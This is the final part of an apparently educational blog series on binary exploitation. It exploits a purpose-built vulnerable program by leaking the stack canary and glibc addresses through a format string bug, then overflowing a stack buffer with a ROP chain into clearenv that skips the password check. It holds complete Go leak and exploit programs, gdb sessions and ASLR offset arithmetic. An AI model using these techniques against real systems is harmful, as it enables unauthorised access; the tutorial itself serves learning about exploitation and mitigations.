Leveraging glibc in exploitation - Part 4: An example
In part three, we introduced an example program named “big-roi” and discussed its defenses against binary exploitation. We can finally take everything we learned from the previous posts and build an exploit that leverages glibc.
Table of contents
Posts in this series
- Part one: What is glibc?
- Part two: Fingerprinting glibc
- Part three: Defenses
- Part four: An example
Putting theory into practice
In the previous part, I introduced a vulnerable example program named “big-roi”, and we examined some of the built-in defenses it possesses against binary exploitation. Now for the fun part - hacking!
The source code for big-roi can be found on GitLab.
To minimize the differences between your environment and my own, I recommend
running the pre-compiled executable found within the git repository on
a Ubuntu 20.04 system. The executable can be quasi-authenticated by diff’ing
(or hashing) the included objdump
disassembly with your own:
# Note: The provided objdump output uses "intel" syntax.
$ objdump -D -M intel big-roi > /tmp/big-roi.objdump.txt
$ diff big-roi.objdump.txt /tmp/big-roi.objdump.txt
The application takes two arguments: a TCP port to listen on, and a file path to share. The user can optionally set a password by generating a bcrypt password string, and setting an environment variable equal to the bcrypt string. For example:
# Note: This requires openssl.
# Refer to "man openssl-passwd" for more information.
$ export PASSWORD_BCRYPT=$(openssl passwd -5)
# <Type in a password and confirm it>
$ echo 'keith says to forget about it!' > /tmp/secret-data
$ ./big-roi 6666 /tmp/secret-data
Users can retrieve the file by connecting to the process over TCP and sending a password:
# Note: Make sure to not include a trailing newline character.
$ printf '%s' 'gfy' | nc 127.0.0.1 6666
incorrect password: gfy
$ printf '%s' '<actual password>' | nc 127.0.0.1 6666
keith says to forget about it!
Our goal will be to bypass the program’s password check by leveraging glibc. While this post will focus on the glibc angle, I highly encourage readers to explore other exploitation possibilities with the same security constraints we will be facing here.
Due to the complexity involved in explaining and illustrating a vulnerable program, any example will be at least slightly contrived. The more realistic the example, the more binary exploitation concepts it touches. The main goal of this example is to display something a well-intentioned programmer might implement as an experiment, which unfortunately became the next link in a chain an attacker was chomping on.
Bugs
There are two security bugs in the big-roi example. Feel free to search for them yourself before we discuss them in the next few sections - they are not meant to be difficult to find. The main theme of the bugs is that the developer got a little lazy, and made some unfortunate copy-paste choices and typos.
Outright memory corruption
Starting from the beginning of the source file, the first security bug of interest appears on lines 40 and 55:
|
|
The buf
variable is a buffer (a chunk of memory) allocated on the call stack.
We know it is allocated on the stack because it is a local variable, and its
size (102 bytes) is known at compile time. While there is nothing inherently
wrong with allocating a buffer on the stack, line 55 proceeds to read
significantly more than 102 bytes into the buffer from socket
, which is the
connection with a TCP client. Perhaps the buffer’s size was a simple typo by
the imaginary programmer :)
This is a classic stack-based buffer overflow bug. If you recall from part two of this series, the call stack (or “stack” as it is often called) is where the program stores everything a function needs to execute (such as local variables). It consists of many “stack frames” - each frame represents the state of the current executing function. A frame is identified by a beginning and end address. On a x86 64-bit CPU, this information is stored in two CPU registers:
rsp
(the “top” of the stack frame, “sp” meaning “stack pointer”)rbp
(the “bottom” of the stack frame, “bp” meaning “base pointer”)
As the program executes functions, it updates the memory addresses stored in these two registers to point at different slices of the stack. Everything that falls between the addresses found in these registers constitutes the current stack frame.
The stack also stores information about the state of the program. For our part, we are interested in a very specific piece of program state: the saved return instruction pointer. This is a memory address that is used by the program to find its way back to the code that executed the current function. Unbeknownst to the programmer, this piece of information is stored alongside the programmer’s local variables.
When data “overflows” the area allocated for the programmer’s local variables, the overflowing code will eventually overwrite the saved return instruction pointer. When the function returns, the program will restore the corrupted return instruction pointer, resulting in the control flow of the program being subverted.
To be less abstract: a client could connect to big-roi, send more than
102 bytes of data, and overwrite the saved return instruction pointer
with a new address. The attacker-controlled address itself is not
executable code, but instead points to executable code the attacker
would like to run. This can range from code contained in the vulnerable
program, to code supplied by the attacker in the buf
variable. In this
case, we cannot place executable code in buf
and execute it directly
due to non-executable call stack (this is discussed in detail in part three).
It should be noted that a stack-based buffer overflow can be utilized in other
ways. For example, to overwrite a variable that would permit the hacker to
bypass an if
condition. Here, we will turn this bug into a control flow
manipulation capability.
Information leak
Not far from the stack-based buffer overflow, we can find our next bug on line 63, a format string vulnerability:
|
|
The program checks if the bcrypt password environment variable is
set. It then validates the user-supplied password contained in buf
against the bcrypt value with crypt
. If that fails, the program writes
a message back to the TCP client stating that the password was incorrect
along with the password the client supplied. Unfortunately, the user-controlled
password is supplied to the fprintf
format string function as the first
argument. This means an attacker can control the format string specifiers
passed to fprintf
.
Format string vulnerabilities are probably worth a separate blog post due to the capabilities they grant to an attacker. If you are unfamiliar with format string vulnerabilities, the general issue lies in how format string functions work in C.
Imagine the following printf function call:
printf("%s");
While a valid format string specifier is supplied, there is no corresponding
argument being passed to printf
. In other words, we would normally expect
to see:
printf("%s", "foo\n");
One would think missing arguments results in an empty string, literally “%s”, or a default string (like in Go) being written to stdout. Without going into too much detail, format string functions in C will essentially follow the calling convention of the Application Binary Interface (ABI) for the current processor architecture to find arguments.
On x86 64-bit processors, printf("%s")
will treat whatever value is stored
in the rdi
CPU register as a pointer, dereference it, and then look for
a null-terminated string starting at the dereferenced address. This occurs
because the calling convention for x86 64-bit processors specifies that rdi
holds the first argument for a function call. When there are more format
specifiers than there are argument-holding CPU registers, the format string
function looks to the call stack. The function will start popping data off
the stack and use that data as arguments to the corresponding
format specifiers.
The calling convention works a little differently on x86 32-bit processors in that CPU registers are not used for storing or pointing to arguments. Instead, arguments are stored on the call stack, and each successive argument is “popped” off the call stack.
The point is that even if you omit format specifier arguments, the format string function will look for corresponding arguments in places where it would ordinarily expect them. Once the format function “runs out of” CPU registers to check, it will access whatever happens to be stored on the call stack.
Format string functions can also be used to overwrite a process' state in a controlled way, making format string vulnerabilities incredibly devastating. The information leak capability feeds into this by allowing the hacker to discover precisely where important process state resides in memory. Leaked memory addresses can then be supplied to a format string memory overwrite attack, allowing the hacker to overwrite memory in a targeted manner.
Chances are if you find a format string vulnerability, you now have access to
both read and write primitives from a single bug. A recent example of this is
a format string vulnerability in the wifid
daemon in Apple iOS. Initially the
bug was thought to be only useful for denial of service or a limited
information leak. The researchers at “ZecOps” found a novel way to abuse
Objective C format string specifiers to overwrite memory, which allowed them
to achieve remote code execution. 1
While we will be focusing on the information leak capability in this post, I highly recommend reading “Exploiting Format String Vulnerabilities” by “scutt”, a hacker from the Austrian hacker group Team TESO. 2 This paper in particular provides one of the best explanations of format string vulnerabilities I have found so far.
Developing an exploit
There are potentially several ways to exploit big-roi. The method I have in mind will rely on the two bugs we just discussed. First, the format string vulnerability will allow us to leak data from the call stack. This solves two problems for us:
- Leaking the call stack canary
- Leaking glibc addresses
This will allow us to create a stack-buffer overflow payload that will not trip the canary verification code or accidentally break other important process state. In addition, we can use the glibc addresses contained in the leak to fingerprint glibc. As we discussed in part two, this will allow us to locate helpful glibc functionality without having to worry about ASLR, or having to guess which version of glibc we are dealing with. Another reason for pursuing this is the password cannot be leaked. The program does not possess a copy of the password to begin with because it uses a bcrypt hash to verify the user’s password.
What code should we execute then? Most CTF challenges are setup so we can
simply execute “/bin/sh” to get a shell. In fact, there is a neat tool named
“one_gadget”, which will search glibc for a block of code that will execute
the system
C library function, which spawns a shell process. 3 Even if
that helped us here, I think there is a more creative way to exploit
this program.
Let’s take a look at the authentication code again:
|
|
The optional authentication code only executes if the PASSWORD_BCRYPT
environment variable is set. The program checks if the environment variable
is set each time it authenticates the user. Since the program does not handle
the client connection in a separate process, perhaps we can skip this code by
unsetting the environment variable?
The C standard library provides a few functions that accomplish this:
unsetenv
and clearenv
. 4 5 Since clearenv
requires no arguments,
it is the easiest function to integrate into our exploit’s payload.
Leaking call stack data
Let’s start by figuring out how to leak information from the call stack.
The format string vulnerability (via fprintf
) will make this pretty easy for
us. Recall from part two that the layout of call stack memory remains the
same across executions of the program. This means the stack layout should
remain the same even if the program is running on a different computer.
Before we fire up gdb or run the program, we should try to understand exactly
how much memory we can leak. Once we do that, we can conduct a format string
attack and compare the output to what we see in gdb when fprintf
begins execution.
We know we can supply up to <size-of-buf>/2
format specifiers because each
format specifier consists of at least a %
followed by one character - thus
one format specifier costs two bytes of buf
space. The %p
format specifier
is particularly interesting because it will cause the format string function to
read a pointer’s-worth of memory at a time, and then format it as
0x<hex-encoded-value>
. These attributes are important for several reasons:
- The
0x
prefix can be treated as a delimiter, thus allowing us to easily parse the data into an array (more on the nuances of this later) - By reading a pointer’s worth of memory at a time, we are guaranteed to respect the layout of the call stack. While pointer values are not the only data stored on the stack, values stored there must fit in the general purpose registers (on a 64-bit processor this means a pointer is 64 bits or 8 bytes)
- Since we can easily parse this data, we can treat each index in the resulting array as an individual element on the call stack
%p
is probably the easiest way to ensure we receive the most data per format specifier
While the buf
variable allocates 102 bytes in the source file, in reality
the compiler rounds that up to make it divisible by the bits of the CPU (in
this case, that is 64 bits, or 8 bytes). As a result, we actually have 104
bytes to work with. We can determine the maximum number of format specifiers
that will fit in the buffer by dividing its length by two (each %p
format
specifier consumes two bytes). This means we can fit 52 format specifiers
in the buffer. The format string function will then leak 52 pointer-sized
chunks of memory. This will total to 416 bytes of memory from general CPU
registers and the call stack (52 * 8 = 416).
With that in mind, go ahead and start gdb and run the program:
$ export PASSWORD_BCRYPT=$(openssl rand -base64 16 | openssl passwd -stdin -5)
$ echo 'foobar' > /tmp/secret-data
$ gdb /tmp/big-roi
(gdb) r 6666 /tmp/secret-data
Starting program: /tmp/big-roi 6666 /tmp/secret-data
Before we write automation that takes advantage of those neat %p
attributes,
we need to get a sense of what fprintf
will spit out. This can be done
with netcat:
# Here is what six "%p" values look like:
$ echo '%p%p%p%p%p%p' | nc 127.0.0.1 6666
incorrect password: 0x110x7fffffffe4b00x14(nil)0x7fffffffe8c60x400000001
# Where the format | | | | | | |
# specifiers fall: |%p |%p |%p |%p |%p |%p |
As you can see, the format function does not pad each value with zeros.
Values that are “zero” are represented with (nil)
without a leading 0x
.
We can work around the latter inconsistency by replacing all instances
of it with 0x00
. Then we can treat 0x
as a delimiter and split the
string into an array. This is probably not the most efficient solution,
but it is simple and effective.
Here is a simple Go application that does this using only the standard library:
src: cmd/leak/main.go
(click to expand)
package main
import (
"bytes"
"errors"
"flag"
"fmt"
"io"
"log"
"net"
)
func main() {
log.SetFlags(0)
bufLenByes := flag.Int("l", 104, "The length of the buf variable in bytes")
flag.Parse()
if flag.NArg() != 1 {
log.Fatalln("please specify the address to connect to")
}
fmtStr := bytes.Repeat([]byte("%p"), *bufLenByes/2)
output, err := dialAndSendBytes(flag.Arg(0), fmtStr)
if err != nil {
log.Fatalf("failed to read all output - %s", err)
}
log.Printf("output from vulnerable program: '%s'", output)
err = stackChunksFromFmtStr(output)
if err != nil {
log.Fatalf("failed to parse format string output - %s", err)
}
}
func dialAndSendBytes(serverAddr string, b []byte) ([]byte, error) {
conn, err := net.Dial("tcp", serverAddr)
if err != nil {
return nil, fmt.Errorf("failed to dial - %w", err)
}
defer conn.Close()
_, err = conn.Write(b)
if err != nil {
return nil, fmt.Errorf("failed to write data - %w", err)
}
output, err := io.ReadAll(conn)
if err != nil {
return nil, fmt.Errorf("failed to read all output - %w", err)
}
return output, nil
}
// Example format string output:
// incorrect password: 0x110x7fffffffe4b00x14(nil)0x7fffffffe8c60x400000001
func stackChunksFromFmtStr(output []byte) error {
if len(bytes.TrimSpace(output)) == 0 {
return errors.New("format string func output is empty")
}
output = bytes.ReplaceAll(output, []byte("(nil)"), []byte("0x00"))
chunks := bytes.Split(output, []byte("0x"))
// Start at index 1 to skip "incorrect password: ".
chunks = chunks[1:]
for i, chunk := range chunks {
log.Printf("chunk %d: %s", i, chunk)
}
return nil
}
Execute the Go program to leak a portion of the call stack:
$ go run cmd/leak/main.go 127.0.0.1:6666
output from vulnerable program: '<data-omitted-for-brevity>'
chunk 0: 68
# ...
chunk 21: 7ffff7f826a0
chunk 22: f
chunk 23: 55555555a9d0
chunk 24: d68
chunk 25: 7ffff7e29ad1
chunk 26: 7025702570257025
chunk 27: 7025702570257025
chunk 28: 7025702570257025
chunk 29: 7025702570257025
chunk 30: 7025702570257025
chunk 31: 7025702570257025
chunk 32: 7025702570257025
chunk 33: 7025702570257025
chunk 34: 7025702570257025
chunk 35: 7025702570257025
chunk 36: 7025702570257025
chunk 37: 7025702570257025
chunk 38: 7025702570257025
chunk 39: ca9055feff69a500
chunk 40: 5555555553e0
chunk 41: 5555555559d0
chunk 42: 7fffffffe550
chunk 43: 555555555768
chunk 44: 7fffffffe8c6
chunk 45: 400000000
chunk 46: 7fffffffe5d0
chunk 47: 5555555559c6
chunk 48: 7fffffffe6c8
chunk 49: 300000000
chunk 50: 555555554040
chunk 51: 1000f0b5ff
This output tells us where each chunk of call stack memory resides in the Go slice (if you are unfamiliar with Go, think of a slice as an array). We still need to figure out what these chunks are. The first order of concern is locating where the call stack canary and the saved return instruction pointer are. Once we figure that out, we can test our exploit in gdb. Testing in gdb not only allows us to practice without ASLR, but also allows us to troubleshoot our exploit if it fails.
Naturally, there are several ways to figure out where these important values reside. In this scenario, we will use eyeballs along with gdb.
One of the first things you might have noticed is the repeating
7025702570257025
chunks. If you hex decode that chunk, you will find
it is a piece of the format string stored in reverse order (p%p%p%p%
).
This is due to x86 storing byte sequences in little-endian order. We can
identify the beginning and end indexes of the buf
variable by simply
looking for those chunks, which would be indexes 26 and 38, respectively.
Finding the call stack canary is straightforward because:
- It will be placed after the local variables (of which
buf
is one) - Is 64 bits (8 bytes) in size
- Is usually prefixed with
0x00
(refer to part three for more details on this)
Looking at the chunks of memory that appear after buf
, there is only
one chunk that matches the criteria, which is chunk 39 with the value:
ca9055feff69a500
(again, reversed due to x86’s little-endianness).
If there were other canary-looking chunks, we could jump into gdb to
double-check our assumption - but that is not the case here.
The saved return instruction pointer is a bit trickier. To be completely honest, I expected only one chunk of memory between the canary and the saved return instruction pointer, which should be the previous stack frame’s base pointer. The saved return instruction pointer should follow after the saved base pointer. My expectation is based on various blog posts I have read. 6 7 8 In this case there are two chunks of memory that appear between the canary and the saved base pointer. I am not sure why this is, and I could not find any immediately obvious explanations for this behavior.
We can use gdb to help us find the saved return instruction pointer by
pausing the program’s execution with ctrl+c
. The info symbol
command
can then be used to trial and error our way to victory. This debugger
command attempts to find a symbol (such as a function name) associated with
a memory address. We can simply plug in the addresses that trail buf
and
look for one associated with the calling function (notifyNewClient
):
^C
Program received signal SIGINT, Interrupt.
0x00007ffff7eb9237 in __libc_accept (fd=3, addr=..., len=0x7fffffffe57c) at ../sysdeps/unix/sysv/linux/accept.c:26
26 in ../sysdeps/unix/sysv/linux/accept.c
# Chunk 40:
(gdb) info symbol 0x5555555553e0
_start in section .text of /tmp/big-roi
# Chunk 41:
(gdb) info symbol 0x5555555559d0
__libc_csu_init in section .text of /tmp/big-roi
# Chunk 42:
(gdb) info symbol 0x7fffffffe550
No symbol matches 0x7fffffffe550.
# And chunk 43 is our winner!
(gdb) info symbol 0x555555555768
notifyNewClient + 48 in section .text of /tmp/big-roi
Fantastic - chunk index 43 contains the saved return instruction pointer.
Exploiting the buffer overflow
Now that we know how to programmatically retrieve and reference the call stack canary and other important memory chunks, we can build a new Go slice variable containing our exploit payload. The slice can then be “serialized” into bytes, which will overwrite the process' call stack state when we write it to big-roi via TCP.
The final binary exploitation concept we need to discuss before exploiting
big-roi is return-oriented programming (ROP). ROP will allow us to subvert
control flow to clearenv
, and then back to the original calling function.
Like format string attacks, ROP has its own nuances and strategies that
could fill a dedicated blog post. Full disclosure: I will simplify how
ROP works here to keep things relatively concise and readable.
The “return” in ROP refers to the behavior of the ret
CPU instruction
which looks up the saved return instruction pointer and jumps execution
back to that address. The ret
instruction accomplishes this by popping
a pointer’s-worth of memory off the top of the call stack. It assumes
that this chunk of memory is the saved return instruction pointer and
jumps execution to whatever it points at. After the pop occurs, the stack
pointer will be pointing at whatever happens to be next on the call
stack. 9 This allows a hacker to execute code of their choosing by
placing a sequence of ret
s on the stack.
A collection of CPU instructions that concludes with the ret
instruction is
known as a “ROP gadget”. A hacker can change the control flow of a process
by strategically placing the addresses of ROP gadgets on the stack. Upon
finishing execution, each gadget executes the next gadget simply by executing
its ret
. This is known as a “ROP chain”. Using ROP to execute code in glibc
is sometimes referred to as “ret2libc”.
In our case, we will implement a very basic ROP chain consisting of two
gadgets: the clearenv
function, and the original saved return instruction
pointer. When clearenv
finishes executing, it will ret
the original saved
return instruction pointer that we strategically placed on the call stack.
This will return us to the original calling function (notifyNewClient
),
which will then return back to the main
function. Not only will this
execute clearenv
, but it will also guarantee that the process keeps
running by resuming the original control flow.
We can test our exploit in gdb. That way we can defer fingerprinting glibc and explore ROP. To find a function’s address in gdb, we can use either of the following commands:
(gdb) info address clearenv
Symbol "clearenv" is at 0x7ffff7ddf830 in a file compiled without debugging.
(gdb) p &clearenv
$1 = (int (*)(void)) 0x7ffff7ddf830 <__clearenv>
Now that we know more about the call stack structure, here is what our exploit payload will look like:
+--------------------------------+
| 104 bytes to fill buf variable |
+--------------------------------+
| leaked call stack canary |
+--------------------------------+
| leaked memory chunk 1 |
+--------------------------------+
| leaked memory chunk 2 |
+--------------------------------+
| leaked saved base pointer |
+--------------------------------+
| address of the cleanenv |
| function in glibc |
+--------------------------------+
| original saved return |
| instruction pointer to |
| notifyNewClient function |
+--------------------------------+
As we discussed earlier, x86 stores data in memory in little-endian order.
The %p
format specifier reverses the endianness of its arguments. Because
of this, we need to reverse the endianness of any chunks of memory that
fprintf
spits out before we send them back to big-roi. Failing to do so will
create invalid memory addresses and will cause big-roi to crash.
We can adapt the Go program from earlier to create a new slice containing the exploit payload from above, and then re-connect to get the contents of the secret file. That is what I have done here:
src: cmd/exploit/main.go
(click to expand)
package main
import (
"bytes"
"encoding/hex"
"flag"
"fmt"
"io"
"log"
"net"
)
func main() {
log.SetFlags(0)
bufLenBytes := flag.Int(
"l",
104,
"The length of the buf variable in bytes")
csCanaryIndex := flag.Int(
"c",
39,
"The index of the call stack canary in the format string output")
numChunksUntilRIP := flag.Int(
"r",
3,
"The number of memory chunks between the canary and RIP")
flag.Parse()
if flag.NArg() != 2 {
log.Fatalln("please specify the address to connect to and the address of clearenv")
}
flag.VisitAll(func(f *flag.Flag) {
if f.Value.String() == "" || f.Value.String() == "0" {
log.Fatalf("please specify '-%s' - %s", f.Name, f.Usage)
}
})
serverAddr := flag.Arg(0)
clearenvAddr := fmtOutputToBytesOrExit([]byte(flag.Arg(1)))
fmtStr := bytes.Repeat([]byte("%p"), *bufLenBytes/2)
output, err := dialAndSendBytes(serverAddr, fmtStr)
if err != nil {
log.Fatalf("failed to send initial payload - %s", err)
}
output = bytes.ReplaceAll(output, []byte("(nil)"), []byte("0x00"))
memoryChunks := bytes.Split(output, []byte("0x"))
// Start at index 1 to skip "incorrect password: ".
memoryChunks = memoryChunks[1:]
log.Printf("initial output from vulnerable program: '%s'", output)
exploitPayload := bytes.Repeat([]byte{0x41}, *bufLenBytes)
csCanary := fmtOutputToBytesOrExit(memoryChunks[*csCanaryIndex])
log.Printf("call stack canary: '0x%x'", csCanary)
exploitPayload = append(exploitPayload, wrongEndian(csCanary)...)
for i := 0; i < *numChunksUntilRIP; i++ {
garbage := fmtOutputToBytesOrExit(memoryChunks[*csCanaryIndex+i+1])
log.Printf("preserving chunk: '0x%x'", garbage)
exploitPayload = append(exploitPayload, wrongEndian(garbage)...)
}
rip := fmtOutputToBytesOrExit(memoryChunks[*csCanaryIndex+*numChunksUntilRIP+1])
log.Printf("existing return instruction pointer: '0x%x'", rip)
exploitPayload = append(exploitPayload, wrongEndian(clearenvAddr)...)
log.Printf("clearenv address: '0x%x'", clearenvAddr)
exploitPayload = append(exploitPayload, wrongEndian(rip)...)
log.Printf("sending payload: 0x%x", exploitPayload)
_, err = dialAndSendBytes(serverAddr, exploitPayload)
if err != nil {
log.Fatalf("failed to send exploit payload - %s", err)
}
log.Println("getting secret file contents...")
fileContents, err := dialAndSendBytes(serverAddr, []byte("\n"))
if err != nil {
log.Fatalf("failed to get file contents - %s", err)
}
log.Printf("secret file contents: '%s'", fileContents)
}
func dialAndSendBytes(serverAddr string, b []byte) ([]byte, error) {
conn, err := net.Dial("tcp", serverAddr)
if err != nil {
return nil, fmt.Errorf("failed to dial - %w", err)
}
defer conn.Close()
_, err = conn.Write(b)
if err != nil {
return nil, fmt.Errorf("failed to write data - %w", err)
}
output, err := io.ReadAll(conn)
if err != nil {
return nil, fmt.Errorf("failed to read all output - %w", err)
}
return output, nil
}
func fmtOutputToBytesOrExit(b []byte) []byte {
var tmp []byte
for i := range b {
// Only include hex characters (0-9, A-F, a-f).
if (b[i] > 0x29 && b[i] < 0x3a) || (b[i] > 0x40 && b[i] < 0x47) || (b[i] > 0x60 && b[i] < 0x67) {
tmp = append(tmp, b[i])
}
}
tmpStr := string(tmp)
if len(tmp)%2 != 0 {
tmpStr = "0" + tmpStr
}
addr, err := hex.DecodeString(tmpStr)
if err != nil {
log.Fatalf("failed to hex decode '%s' - %s", b, err)
}
finalAddr := make([]byte, 8)
if len(addr) < 8 {
copy(finalAddr[8-len(addr):], addr)
} else {
finalAddr = addr
}
return finalAddr
}
func wrongEndian(src []byte) []byte {
dst := make([]byte, 8)
for i := 0; i < 8; i++ {
dst[8-1-i] = src[i]
}
return dst
}
We can test the exploit using the clearenv
address we obtained
from the gdb’ed big-roi process:
$ go run cmd/exploit/main.go 127.0.0.1:6666 0x7ffff7ddf830
initial output from vulnerable program: 'incorrect password: <snip>'
call stack canary: '0xca9055feff69a500'
preserving chunk: '0x00005555555553e0'
preserving chunk: '0x00005555555559d0'
preserving chunk: '0x00007fffffffe550'
existing return instruction pointer: '0x0000555555555768'
clearenv address: '0x00007ffff7ddf830'
sending payload: 0x<snip>004cf6a1794162dce053555555550000d05955555555000050e5ffffff7f000030f8ddf7ff7f00006857555555550000
getting secret file contents...
secret file contents: 'foobar
'
Locating glibc addresses
While we have successfully validated our exploit in a test environment,
we still need to find clearenv
’s address without the debugger’s help.
Incidentally, we do need to rely on gdb just a bit more. As we examined in
part two, if we can find pointers to glibc code on the stack, we can use them
to work our way back to the glibc version used at runtime. Since the
stack layout will be the same regardless of ASLR or other mitigations,
we can simply leak those addresses by knowing where they are in the Go slice.
Start big-roi in gdb again:
$ gdb /tmp/big-roi
(gdb) r 6666 /tmp/secret-data
Starting program: /tmp/big-roi 6666 /tmp/secret-data
And run the “leak” Go program again, this time redirect the output to stdout
and grep for “ 7f
”. This will filter for potential library mappings (recall
from part two that this is the memory region where libraries are typically
mapped to on Linux):
$ go run cmd/leak/main.go 127.0.0.1:6666 2>&1 | grep ' 7f'
chunk 1: 7fffffffe4b0
chunk 4: 7fffffffe8c6
chunk 10: 7fffffffe5d0
chunk 12: 7fffffffe6c0
chunk 15: 7fffffffe6c0
chunk 18: 7fffffffe5d0
chunk 19: 7ffff7e2800d
chunk 21: 7ffff7f826a0
chunk 25: 7ffff7e29ad1
chunk 42: 7fffffffe550
chunk 44: 7fffffffe8c6
chunk 46: 7fffffffe5d0
chunk 48: 7fffffffe6c8
And once again pause big-roi’s execution with ctrl+c
and lookup each
address to see if it is associated with a glibc symbol:
^C
Program received signal SIGINT, Interrupt.
# Chunk 1:
(gdb) info symbol 0x7fffffffe4b0
No symbol matches 0x7fffffffe4b0.
# Chunk 4:
(gdb) info symbol 0x7fffffffe8c6
No symbol matches 0x7fffffffe8c6.
# Chunk 10:
(gdb) info symbol 0x7fffffffe5d0
No symbol matches 0x7fffffffe5d0.
# Chunk 12:
(gdb) info symbol 0x7fffffffe6c0
No symbol matches 0x7fffffffe6c0.
# Chunk 19:
(gdb) info symbol 0x7ffff7e2800d
_IO_file_write + 45 in section .text of /lib/x86_64-linux-gnu/libc.so.6
# Chunk 21:
(gdb) info symbol 0x7ffff7f826a0
_IO_2_1_stdout_ in section .data of /lib/x86_64-linux-gnu/libc.so.6
# Chunk 25:
(gdb) info symbol 0x7ffff7e29ad1
_IO_do_write + 177 in section .text of /lib/x86_64-linux-gnu/libc.so.6
When info symbol
locates an address in a known symbol it includes not only
the symbol name and its relative offset to the symbol, but also the
memory-mapped object the symbol originates from. As seen above, chunks 19, 21,
and 25 are from the glibc shared object /lib/x86_64-linux-gnu/libc.so.6
.
Note that gdb’s x
command adds the word new
to glibc symbol names when
examining memory. This can add a layer of confusion when debugging
an exploit.
Exploiting big-roi for real
We have developed information leak and exploit automation, and verified that both work in a test environment. It is time to exploit big-roi outside of gdb. The steps involved will be mostly the same, but this time we will add a little bit of basic arithmetic.
Start by running big-roi outside of gdb:
$ export PASSWORD_BCRYPT=$(openssl rand -base64 16 | openssl passwd -stdin -5)
$ /tmp/big-roi 6666 /tmp/secret-data
In another shell, run the leak
program and find the memory chunk indexes
that contain glibc pointers from earlier:
go run cmd/leak/main.go 127.0.0.1:6666
# ...
chunk 19: 7f3568bf400d
chunk 21: 7f3568d4e6a0
chunk 25: 7f3568bf5ad1
# ...
Before we can look these symbols up in a glibc database tool like libc.blukat.me, we need to do a bit of math. Remember, some of these addresses are offset from the start of the corresponding glibc code by several bytes. We need to adjust the addresses like so:
# Chunk 19: _IO_file_write + 45
0x7f3568bf400d - 0x2d = 0x7f3568bf3fe0
# Chunk 21: _IO_2_1_stdout_
0x7f3568d4e6a0
# Chunk 25: _IO_do_write + 177
0x7f3568bf5ad1 - 0xb1 = 0x7f3568bf5a20
Use one of the glibc databases we discussed in part two to lookup the symbols.
In my case, libc.blukat.me
narrowed it down to three possibilities:
- libc6_2.31-0ubuntu9.1_amd64
- libc6_2.31-0ubuntu9.2_amd64
- libc6_2.31-0ubuntu9_amd64
In the real world, you would need to test for all three versions. To keep
things simple, we will pretend we did that and found that option two
(ubuntu9.2_amd64
) is the target. These databases typically provide the
relative offset of symbols from the beginning of the file. This is
important because subtracting one of the symbol’s offsets from its address
will reveal the base address of glibc. From there, we can add the offset of
clearenv
, which will yield the absolute address of the function symbol:
# <_IO_file_write addr> <offset> <glibc base addr>
0x7f3568bf3fe0 - 0x091fe0 = 0x7f3568b62000
# <glibc base addr> <clearenv offset> <clearenv addr>
0x7f3568b62000 + 0x049830 = 0x7f3568bab830
Finally, plug the calculated address of clearenv
into the exploit program:
$ go run cmd/exploit/main.go 127.0.0.1:6666 0x7f3568bab830
initial output from vulnerable program: 'incorrect password: <...>'
call stack canary: '0xdb1d60c36b92ed00'
preserving chunk: '0x000056321d4b53e0'
preserving chunk: '0x000056321d4b59d0'
preserving chunk: '0x00007fff6b51c0a0'
existing return instruction pointer: '0x000056321d4b5768'
clearenv address: '0x00007f3568bab830'
sending payload: 0x<...>00ed926bc3601ddbe0534b1d32560000d0594b1d32560000a0c0516bff7f000030b8ba68357f000068574b1d32560000
getting secret file contents...
secret file contents: 'foobar
'
w00t!
Conclusion
In this series, we examined glibc’s relationship with a vulnerable program
and an exploit. We located useful process state by capitalizing on the
repeatability of the call stack layout, the default higher bits of addresses
(0x00007f
and 0x000055
), and the structure of a call stack canary.
We also explored techniques for working around mitigations like ASLR and NX.
A high-level understanding of these topics allowed us to discover and leak useful information about a vulnerable program. We automated the creation and delivery of our exploit using two simple Go programs, which ultimately allowed us to bypass the vulnerable program’s built-in defenses.
The overall strategy remains largely the same despite thirty years of advancements in defenses: find a way to subvert a process' control flow, locate useful glibc code, and pivot execution to that code. Unfortunately, documentation on this subject is often fragmented or was written before the introduction of contemporary mitigations.
While esoteric, I believe this information should be easily obtainable and accurate. Not only so others can learn about binary exploitation. But also to learn from the shortcomings of iterative security mitigations.
Thank you for reading. Good night, and good luck.
References
-
blog.zecops.com. 2021, July 17. “Meet WiFiDemon - iOS WiFi RCE 0-day Vulnerability, and a Zero-Click Vulnerability That Was Silently Patched”. ↩︎
-
scutt / Team TESO. 2001, September 1. “Exploiting Format String Vulnerabilities (version 1.2)”. ↩︎
-
david942j. Accessed: 2022, April 20. “one_gadget - The best tool for finding one gadget RCE in libc.so.6”. ↩︎
-
linux.die.net. Accessed: 2022, May 1. “unsetenv(3) - Linux man page”. ↩︎
-
linux.die.net. Accessed: 2022, May 1. “clearenv(3) - Linux man page”. ↩︎
-
Bendersky, Eli. 2011, September 6. “Stack frame layout on x86-64”. ↩︎
-
cons.mit.edu. 2017. “X86-64 Architecture Guide”. ↩︎
-
Krzyzanowski, Paul. 2018, February 16. “Stack frames”. ↩︎
-
felixcloutier.com. Accessed: 2022, May 1. “RET - Return from Procedure”. ↩︎